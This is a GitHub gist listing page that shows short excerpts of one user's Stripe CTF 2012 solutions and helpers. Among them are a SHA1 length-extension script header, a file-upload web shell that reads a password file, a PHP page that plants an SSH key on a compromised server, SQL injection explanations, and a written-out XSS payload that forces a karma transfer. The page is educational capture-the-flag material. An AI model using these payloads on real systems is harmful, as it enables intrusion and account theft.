Bubba bubba-h57

@bubba-h57
bubba-h57 / SecureToken.php
Created March 13, 2012 22:41
A simple method for communicating key->data sets across requests/machines along with some meta-data regarding lifetime of the data as well as owner.
<?php
/*
* A simple method for communicating key->data sets across
* requests/machines along with some meta-data regarding
* lifetime of the data as well as owner.
*
* For example, assume a token is emailed to individuals that
* allow them to access some particular data/functionality
* for a specific period of time. By providing a URL for them
* to click that has the token embedded, you can verify the data
bubba-h57 / decrypt.pl
Created July 22, 2012 04:52
PHP Compatible PERL mcrypt function
$encryptedString = '7DjnpOXG+FrUaOuc8x6vyrkk3atSiAf425ly5KpG7lOYgwouw2UATw==';
$iv = '12345678';
$passphrase = '8chrsLng';
$string = &decryptPhpEncrypted $encryptedString, $passphrase, $iv;
# Expect: Some Secret thing I want to encrypt
sub decryptPhpEncrypted() {
my ($encryptedString, $passphrase, $iv) = @_;
my $keysize = length($passphrase);
bubba-h57 / ctfLevel7.py
Created August 24, 2012 17:02
Stripe CTF Level 7 Helper File
#!/usr/bin/env python
#
# sha1 padding/length extension attack
# by rd@vnsecurity.net
# modified by ... rob@hines57.com
#
import sys
import hashlib
import sha
bubba-h57 / hax.php
Created August 25, 2012 02:28
Stripe CTF Level 8 - Compromise Level 2 Server for SSH login w/Public Key
<html>
<head>
<title>Bubba Hacks Level 2 Server</title>
</head>
<body>
<?php
$myPubKey = 'STICK YER OWN PUB KEY INFO HERE';
print "Finding Real Path ...<br/>";
bubba-h57 / gist:3494120
Created August 28, 2012 01:31
Stripe CTF Level 0 - Solution SQL Injection
We can see that it's querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it's using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.
bubba-h57 / gist:27d8515d2130ff84c9cb
Created August 28, 2012 01:37
Stripe CTF Level 1 - Solution Misuse of PHP Function on Untrusted Data
So let's step through the code and see what's happening:
    creates $filename storing 'secret-combination.txt'
    extract $_GET (all GET parameters supplied by the user)
    if $attempt is set:
        declare $combination with the trim()'d contents of $filename
        if $attempt and $combination are equal
            print contents of 'level02-password.txt'
        else
            print incorrect
bubba-h57 / gist:b3bed567e380728f67ee
Created August 28, 2012 01:53
Stripe CTF Level 2 - Solution File Upload Vulnerability
<html>
<head>
<title>Bubba Hacks Level 2 Server</title>
</head>
<body>
<h1>Your Level 3 Password</h1>
<?php echo file_get_contents('../password.txt'); ?>
</body>
</html>
bubba-h57 / gist:15eee9045b4bbcc6df18
Created August 28, 2012 02:13
Stripe CTF Level 3 - Solution SQL Injection
Ok, so let’s look at some important parts. We know it's sqlite3 again and how it is set up:
# CREATE TABLE users (
# id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
# username VARCHAR(255),
# password_hash VARCHAR(255),
# salt VARCHAR(255)
# );
bubba-h57 / gist:3528113
Created August 30, 2012 13:05
Stripe CTF Level 4 - Solution XSS/XSRF
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
When registering a new account, you can insert malicious code into the password field, which will then be displayed once you send someone karma because the application is designed to show users your password once they receive karma.
In this situation they're including jQuery, so it makes our lives even easier when trying to make requests. The idea is to inject some malicious code into the karma_fountain's page that will automatically make them transfer you some karma.
I went and created a new user named 'bubba' with the password:
'<script>$.post("transfer", { to: "bubba", amount: "2" } );</script>'
bubba-h57 / gist:3528134
Created August 30, 2012 13:06
Stripe CTF Level 5 - Solution Insecure Communication
So, this problem is just... insecure communication in general. There are a couple of issues here.
This code block checks to see if it was a POST but doesn't check if parameters supplied were on the GET or POST lines:
post '/*' do
pingback = params[:pingback]
username = params[:username]